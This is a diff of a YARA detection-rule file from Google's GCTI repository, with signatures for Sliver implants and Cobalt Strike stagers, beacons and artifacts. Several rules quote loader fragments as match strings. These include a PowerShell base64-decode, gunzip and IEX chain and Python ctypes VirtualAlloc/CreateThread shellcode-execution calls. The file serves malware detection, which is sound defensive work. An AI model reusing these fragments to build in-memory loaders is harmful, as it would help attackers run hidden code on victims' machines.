  * Repository: https://github.com/chronicle/GCTI
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 1c5fd42b1895098527fde00c2d9757edf6b303bb
  * Number of Rules: 90
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
@@ -78930,266 +78877,134 @@ rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_1 : FILE
    limitations under the License.
 
  */
-rule GCTI_Sliver_Implant_64Bit
-{
-	meta:
-		description = "Sliver 64-bit implant (with and without --debug flag at compile)"
-		author = "gssincla@google.com"
-		id = "b84db933-0e11-5871-821d-43697c015665"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/Sliver/Sliver__Implant_64bit.yara#L17-L84"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "2d1c9de42942a16c88a042f307f0ace215cdc67241432e1152080870fe95ea87"
-		logic_hash = "ad4ceef08a732174c8ccbcacf0370b26acb9e5ec0784d8827c8104618e018a26"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$s_tcppivot = { 48 ?? 74 63 70 70 69 76 6F 74 }
-		$s_namedpipe = { 48 ?? 6E 61 6D 65 64 70 69 70 [2-32] 80 ?? 08 65 }
-		$s_https = { 81 ?? 68 74 74 70 [2-32] 80 ?? 04 73 }
-		$s_wg = {66 81 ?? 77 67}
-		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
-		$s_mtls = {  81 ?? 6D 74 6C 73  }
-		$fp1 = "cloudfoundry" ascii fullword
-
-	condition:
-		5 of ( $s* ) and not 1 of ( $fp* )
-}
-rule GCTI_Sliver_Implant_32Bit
-{
-	meta:
-		description = "Sliver 32-bit implant (with and without --debug flag at compile)"
-		author = "gssincla@google.com"
-		id = "6bc4d7d1-64cf-5920-8f07-54a8a7a94f26"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/Sliver/Sliver__Implant_32bit.yara#L17-L81"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "911f4106350871ddb1396410d36f2d2eadac1166397e28a553b28678543a9357"
-		logic_hash = "5b394a198f691b6777438a69d20a423798525daa84a09a0ce346eca5bb66f850"
-		score = 60
-		quality = 35
-		tags = ""
-
-	strings:
-		$s_tcppivot = { 81 ?? 74 63 70 70 [2-20] 81 ?? 04 69 76 6F 74  }
-		$s_wg = { 66 81 ?? 77 67 }
-		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
-		$s_http = { 81 ?? 68 74 74 70 }
-		$s_https = { 81 ?? 68 74 74 70 [2-20] 80 ?? 04 73 }
-		$s_mtls = { 81 ?? 6D 74 6C 73 }
-		$fp1 = "cloudfoundry" ascii fullword
-
-	condition:
-		4 of ( $s* ) and not 1 of ( $fp* )
-}
-rule GCTI_Cobaltstrike_Resources_Command_Ps1_V2_5_To_V3_7_And_Resources_Compress_Ps1_V3_8_To_V4_X
-{
-	meta:
-		description = "Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x"
-		author = "gssincla@google.com"
-		id = "c0b81deb-ed20-5f7e-8e15-e6a9e9362594"
-		date = "2022-11-18"
-		modified = "2022-11-22"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x.yara#L17-L33"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62"
-		logic_hash = "31cf47060757b086d325cd205724a7be8931bbbc6ff2f4be67a6179ee99c42ca"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$ps1 = "$s=New-Object \x49O.MemoryStream(,[Convert]::\x46romBase64String(" nocase
-		$ps2 = "));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" nocase
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Template_Py_V3_3_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Template_Sct_V3_3_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/template.py signature for versions v3.3 to v4.x"
+		description = "Cobalt Strike's resources/template.sct signature for versions v3.3 to v4.x"
 		author = "gssincla@google.com"
-		id = "16aef9a9-b217-5462-93dc-f6273c99ddd0"
+		id = "9d2b1dfa-5f76-503f-9198-6ed0d039e0cb"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Py_v3_3_to_v4_x.yara#L17-L36"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Sct_v3_3_to_v4_x.yara#L17-L38"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "d5cb406bee013f51d876da44378c0a89b7b3b800d018527334ea0c5793ea4006"
-		logic_hash = "3c26cea4b8f2b200bf58e939ae9ead7a7339d4ec0de8c72b3d9c7da897600081"
+		hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142"
+		logic_hash = "8868445ced4945c469764b7f311d6cb11c99cf0f2d770113e5e617e0187a962c"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$arch = "platform.architecture()"
-		$nope = "WindowsPE"
-		$alloc = "ctypes.windll.kernel32.VirtualAlloc"
-		$movemem = "ctypes.windll.kernel32.RtlMoveMemory"
-		$thread = "ctypes.windll.kernel32.CreateThread"
-		$wait = "ctypes.windll.kernel32.WaitForSingleObject"
+		$scriptletstart = "<scriptlet>" nocase
+		$registration = "<registration progid=" nocase
+		$classid = "classid=" nocase
+		$scriptlang = "<script language=\"vbscript\">" nocase
+		$cdata = "<![CDATA["
+		$scriptend = "</script>" nocase
+		$antiregistration = "</registration>" nocase
+		$scriptletend = "</scriptlet>"
 
 	condition:
-		all of them
+		all of them and @scriptletstart [ 1 ] < @registration [ 1 ] and @registration [ 1 ] < @classid [ 1 ] and @classid [ 1 ] < @scriptlang [ 1 ] and @scriptlang [ 1 ] < @cdata [ 1 ]
 }
-rule GCTI_Cobaltstrike_Resources_Smbstager_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Httpstager64_Bin_V3_2_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/smbstager.bin signature for versions 2.5 to 4.x"
+		description = "Cobalt Strike's resources/httpstager64.bin signature for versions v3.2 to v4.x"
 		author = "gssincla@google.com"
-		id = "074b7d83-e3d8-541c-804b-2417c21f54d5"
+		id = "5530dce8-e5a1-5133-9b05-464e3397084a"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Smbstager_Bin_v2_5_through_v4_x.yara#L17-L95"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager64_Bin_v3_2_through_v4_x.yara#L17-L85"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c"
-		logic_hash = "b0f6535069df16a64de44ca0638ec060c1ff264a7820c94710d61ca7e8474450"
+		hash = "ad93d1ee561bc25be4a96652942f698eac9b133d8b35ab7e7d3489a25f1d1e76"
+		logic_hash = "23666169565c6b3e5fa71767dc31096e7a25be049eeab16b074053d76c97c70b"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
 		$apiLocator = {
-			31 ??
+			48 [2]
 			AC
-			C1 ?? 0D
-			01 ??
+			41 [2] 0D
+			41 [2]
 			38 ??
 			75 ??
-			03 [2]
-			3B [2]
+			4C [4]
+			45 [2]
 			75 ??
 			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
+			44 [2] 24
+			49 [2]
+			66 [4]
+			44 [2] 1C
+			49 [2]
+			41 [3]
+			48
 		}
-		$smb = { 68 C6 96 87 52 }
-		$smbstart = {
-			6A 40
-			68 00 10 00 00
-			68 FF FF 07 00
-			6A 00
-			68 58 A4 53 E5
+		$postInternetOpenJmp = {
+			41 ?? 3A 56 79 A7
+			FF ??
+			EB
 		}
 
 	condition:
-		$apiLocator and $smb and $smbstart
+		$apiLocator and $postInternetOpenJmp
 }
-rule GCTI_Cobaltstrike_Resources_Bind_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Reverse64_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/bind.bin signature for versions 2.5 to 4.x"
+		description = "Cobalt Strike's resources/reverse64.bin signature for versions v2.5 to v4.x"
 		author = "gssincla@google.com"
-		id = "32f129c1-9845-5843-9e16-7d9af217b8e2"
+		id = "966e6e4c-85e2-5c94-8245-25367802b7d2"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind_Bin_v2_5_through_v4_x.yara#L17-L111"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse64_Bin_v2_5_through_v4_x.yara#L17-L99"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "3727542c0e3c2bf35cacc9e023d1b2d4a1e9e86ee5c62ee5b66184f46ca126d1"
-		logic_hash = "cf04e257590cf0673059348f5c15926918eb8aee40e864ae65979360aca80013"
+		hash = "d2958138c1b7ef681a63865ec4a57b0c75cc76896bf87b21c415b7ec860397e8"
+		logic_hash = "c657234156293b9ac363b677490739ab0b5cc2ef149c9d9c37332dab9bb012f6"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
 		$apiLocator = {
-			31 ??
+			48 [2]
 			AC
-			C1 ?? 0D
-			01 ??
+			41 [2] 0D
+			41 [2]
 			38 ??
 			75 ??
-			03 [2]
-			3B [2]
+			4C [4]
+			45 [2]
 			75 ??
 			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
-		}
-		$ws2_32 = {
-			5D
-			68 33 32 00 00
-			68 77 73 32 5F
-		}
-		$listenaccept = {
-			5?
-			5?
-			68 B7 E9 38 FF
-			FF ??
-			5?
-			5?
-			5?
-			68 74 EC 3B E1
+			44 [2] 24
+			49 [2]
+			66 [4]
+			44 [2] 1C
+			49 [2]
+			41 [3]
+			48
 		}
-
-	condition:
-		$apiLocator and $ws2_32 and $listenaccept
-}
-rule GCTI_Cobaltstrike_Resources_Elevate_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_Dll_V4_X
-{
-	meta:
-		description = "Cobalt Strike's resources/elevate.dll signature for v3.0 to v3.14 and sleeve/elevate.dll for v4.x"
-		author = "gssincla@google.com"
-		id = "170f62a2-ba4f-5be8-9ec5-402eb7bbde4e"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_Dll_v4_x.yara#L17-L68"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "6deeb2cafe9eeefe5fc5077e63cc08310f895e9d5d492c88c4e567323077aa2f"
-		logic_hash = "766a0a390ed8cefe43d82a054a9b2cfec7eced75e0d7ee10231215043577b75e"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$wnd_proc = {
-			6A 00
-			6A 28
-			68 00 01 00 00
-			5?
-			C7 [5] 01 00 00 00
-			FF ??
-			6A 00
-			6A 27
-			68 00 01 00 00
-			5?
-			FF ??
-			6A 00
-			6A 00
-			68 01 02 00 00
-			5?
-			FF ??
+		$calls = {
+			48 89 C1
+			41 BA EA 0F DF E0
+			FF D5
+			48 [2]
+			6A ??
+			41 ??
+			4C [2]
+			48 [2]
+			41 BA 99 A5 74 61
+			FF D5
 		}
 
 	condition:
-		$wnd_proc
+		$apiLocator and $calls
 }
 rule GCTI_Cobaltstrike_Resources_Covertvpn_Injector_Exe_V1_44_To_V2_0_49
 {
@@ -79255,71 +79070,65 @@ rule GCTI_Cobaltstrike_Resources_Covertvpn_Injector_Exe_V1_44_To_V2_0_49
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Artifact32Svc_Exe_V3_1_V3_2_V3_14_And_V4_X
+rule GCTI_Cobaltstrike_Resources_Elevate_X64_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_X64_Dll_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact32svc(big).exe signature for versions 3.1 and 3.2 (with overlap with v3.14 through v4.x)"
+		description = "Cobalt Strike's resources/elevate.x64.dll signature for v3.0 to v3.14 and sleeve/elevate.x64.dll for v4.x"
 		author = "gssincla@google.com"
-		id = "732169be-e334-5774-b0ac-54b217a8b681"
+		id = "91d5c343-1084-5cfc-9dfa-46f530eb9625"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32svc_Exe_v1_49_to_v4_x.yara#L53-L77"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_X64_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_X64_Dll_v4_x.yara#L17-L71"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "871390255156ce35221478c7837c52d926dfd581173818620b738b4b029e6fd9"
-		logic_hash = "b55211fc2dbe100edb19c3f3a000be513144e3556c4bce8a29a3c0b77451ba96"
+		hash = "c3ee8a9181fed39cec3bd645b32b611ce98d2e84c5a9eff31a8acfd9c26410ec"
+		logic_hash = "6f23bcf6a0c360d2f83140ce633440b13d8b691e75c5560c65656cf8a6114224"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 }
+		$wnd_proc = {
+			81 ?? 21 01 00 00
+			75 ??
+			83 [5] 00
+			75 ??
+			45 33 ??
+			8D [2]
+			C7 [5] 01 00 00 00
+			45 [2] 28
+			FF 15 [4]
+			45 33 ??
+			8D [2]
+			45 [2] 27
+			48 [2]
+			FF 15 [4]
+			45 33 ??
+			45 33 ??
+			BA 01 02 00 00
+			48
+		}
 
 	condition:
-		$decoderFunc
+		$wnd_proc
 }
-rule GCTI_Cobaltstrike_Resources_Xor_Bin__64Bit_V3_12_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Httpstager_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resource/xor64.bin signature for version 3.12 through 4.x"
+		description = "Cobalt Strike's resources/httpstager.bin signature for versions 2.5 to 4.x"
 		author = "gssincla@google.com"
-		id = "5bb465ee-3bbd-5bfe-8b63-1f243de217bc"
+		id = "86109485-c26c-5c51-8d04-dd1add9a8c57"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__64bit_v3_12_to_4_x.yara#L17-L38"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager_Bin_v2_5_through_v4_x.yara#L17-L93"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "01dba8783768093b9a34a1ea2a20f72f29fd9f43183f3719873df5827a04b744"
-		logic_hash = "aabaad09408ae292a0bbc678c334f9f54364b4f6b882846072c303bf826fc2da"
+		hash = "a47569af239af092880751d5e7b68d0d8636d9f678f749056e702c9b063df256"
+		logic_hash = "3baab08b0118e00432f1869ba5daa4fc6383bfc020119bfbb3047a008c33fe72"
 		score = 75
 		quality = 85
 		tags = ""
 
-	strings:
-		$stub58 = {fc e8 ?? ?? ?? ?? [1-32] eb 33 5? 8b ?? 00 4? 83 ?? ?4 8b ?? 00 31 ?? 4? 83 ?? ?4 5? 8b ?? 00 31 ?? 89 ?? 00 31 ?? 4? 83 ?? ?4 83 ?? ?4 31 ?? 39 ?? 74 ?2 eb e7 5? fc 4? 83 ?? f0 ff}
-		$stub59 = {fc e8 ?? ?? ?? ?? [1-32] eb 2e 5? 8b ??    48 83 c? ?4 8b ??    31 ?? 48 83 c? ?4 5? 8b ??    31 ?? 89 ??    31 ?? 48 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e9 5?    48 83 ec ?8 ff e? e8 cd ff ff ff}
-		$stub63 = {fc e8 ?? ?? ?? ?? [1-32] eb 32 5d 8b ?? ?? 48 83 c5 ?4 8b ?? ?? 31 ?? 48 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 48 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e7 5?    48 83 ec ?8 ff e? e8 c9 ff ff ff}
-
-	condition:
-		any of them
-}
-rule GCTI_Cobaltstrike_Resources_Dnsstager_Bin_V1_47_Through_V4_X
-{
-	meta:
-		description = "Cobalt Strike's resources/dnsstager.bin signature for versions 1.47 to 4.x"
-		author = "gssincla@google.com"
-		id = "e1b0e368-9bcf-5d9b-b2b3-8414742f213e"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Dnsstager_Bin_v1_47_through_v4_x.yara#L17-L78"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "10f946b88486b690305b87c14c244d7bc741015c3fef1c4625fa7f64917897f1"
-		logic_hash = "d4500d8a83a821e1df9e808b17a87c1207d78ea0e03886544a632176fe93ccd0"
-		score = 75
-		quality = 83
-		tags = ""
-
 	strings:
 		$apiLocator = {
 			31 ??
@@ -79343,2504 +79152,2567 @@ rule GCTI_Cobaltstrike_Resources_Dnsstager_Bin_V1_47_Through_V4_X
 			5?
 			5?
 		}
-		$dnsapi = { 68 64 6E 73 61 }
+		$downloaderLoop = {
+			B? 00 2F 00 00
+			39 ??
+			74 ??
+			31 ??
+			( E9 | EB )
+		}
 
 	condition:
-		$apiLocator and $dnsapi
+		$apiLocator and $downloaderLoop
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_44
+rule GCTI_Cobaltstrike_Resources_Artifact64_V1_49_V2_X_V3_0_V3_3_Thru_V3_14
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Version 1.44"
+		description = "Cobalt Strike's resources/artifact64{.dll,.exe,big.exe,big.dll,bigsvc.exe,big.x64.dll} and resources/rtifactuac(alt)64.dll signature for versions v1.49, v2.x, v3.0, and v3.3 through v3.14"
 		author = "gssincla@google.com"
-		id = "935ee27f-ce1b-5491-b4a3-cb78f199ab1b"
+		id = "67902782-500e-5a89-8b2a-59ee21bcba3e"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L17-L49"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L17-L54"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "75102e8041c58768477f5f982500da7e03498643b6ece86194f4b3396215f9c2"
-		logic_hash = "ebed8b6dc0b929164b1aa25b491b9d2fbb61d380a8b1268df7d424afe90f613d"
+		hash = "9ec57d306764517b5956b49d34a3a87d4a6b26a2bb3d0fdb993d055e0cc9920d"
+		logic_hash = "289950e89fc743ff4a1b7dcb91c561c7d829cfe3ade1c2f1a09f2e9701cce461"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 0F B7 D2 4A 53 8B D9 83 FA 04 77 36 FF 24 }
-		$decode = { B1 ?? 30 88 [4] 40 3D 28 01 00 00 7C F2 }
+		$a = { 8B [2] 48 98 48 [2] 48 [3] 8B [2] 48 98 48 [3] 44 [3] 8B [2] 89 ?? C1 ?? 1F C1 ?? 1E 01 ?? 83 ?? 03 29 ?? 48 98 48 [3] 0F B6 00 44 [2] 88 }
+
+	condition:
+		$a
+}
+rule GCTI_Cobaltstrike_Resources_Artifact64_V3_1_V3_2_V3_14_And_V4_0
+{
+	meta:
+		description = "Cobalt Strike's resources/artifact64{svcbig.exe,.dll,big.dll,svc.exe} and resources/artifactuac(big)64.dll signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x"
+		author = "gssincla@google.com"
+		id = "c9e9b8e0-16fe-5abc-b1fe-0e3e586f6db6"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L56-L84"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "2e7a39bd6ac270f8f548855b97c4cef2c2ce7f54c54dd4d1aa0efabeecf3ba90"
+		logic_hash = "e5af04baa1d18d5a2a2c005b40bf93fe6a7b2d7116dfcf3c5b3fa36657448eb9"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$decoderFunction = { 31 ?? EB 0F 41 [2] 03 47 [3] 44 [3] 48 [2] 39 ?? 41 [2] 7C EA 4C [6] E9 }
+
+	condition:
+		$decoderFunction
+}
+rule GCTI_Cobaltstrike_Resources_Artifact64_V3_14_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x"
+		author = "gssincla@google.com"
+		id = "1c7731d3-429b-57aa-9c17-8de7d0841b1e"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L86-L128"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44"
+		logic_hash = "af8ba6ba62bf1179510b0940e60f893f61b3ba10c81001dd90fe4c3521e56a37"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$fmtBuilder = {
+			41 ?? 5C 00 00 00
+			C7 [3] 5C 00 00 00
+			C7 [3] 65 00 00 00
+			C7 [3] 70 00 00 00
+			C7 [3] 69 00 00 00
+			C7 [3] 70 00 00 00
+			C7 [3] 5C 00 00 00
+			C7 [3] 2E 00 00 00
+			89 [3]
+			48 [6]
+			E8
+		}
+		$fmtString = "%c%c%c%c%c%c%c%c%cMSSE-%d-server"
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X86_O_V4_3_V4_4_V4_5_And_V4_6
+{
+	meta:
+		description = "Cobalt Strike's sleeve/BeaconLoader.HA.x86.o (HeapAlloc) Versions 4.3 through at least 4.6"
+		author = "gssincla@google.com"
+		id = "0ee3fa6f-367c-596f-a3bc-3bcfa61b97aa"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L17-L59"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "8e4a1862aa3693f0e9011ade23ad3ba036c76ae8ccfb6585dc19ceb101507dcd"
+		logic_hash = "d02257bc556d0b1675997ab6af1b28cf5f498855d6254e3c1cd7eb4a0c4d2715"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$core_sig = {
+      C6 45 F0 48
+      C6 45 F1 65
+      C6 45 F2 61
+      C6 45 F3 70
+      C6 45 F4 41
+      C6 45 F5 6C
+      C6 45 F6 6C
+      C6 45 F7 6F
+      C6 45 F8 63
+      C6 45 F9 00
+    }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_45
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X86_O_V4_3_V4_4_V4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Version 1.45"
+		description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x86.o (MapViewOfFile) Versions 4.3 through at least 4.6"
 		author = "gssincla@google.com"
-		id = "04d4d0ee-f1ee-5888-8108-ca55243c770a"
+		id = "3f7c0553-989e-53e7-87a9-3fa1c47f4b62"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L51-L84"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L61-L111"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "1a92b2024320f581232f2ba1e9a11bef082d5e9723429b3e4febb149458d1bb1"
-		logic_hash = "b1472907e0fe0cb26219c268f23483681cc076dab96c1b0f2f0ee472ad319b4f"
+		hash = "cded3791caffbb921e2afa2de4c04546067c3148c187780066e8757e67841b44"
+		logic_hash = "dd831fb01a403213c06e3d07daf3da5f56655619a686149f9d4beec2331fe6ca"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 51 0F B7 D2 4A 53 56 83 FA 08 77 6B FF 24 }
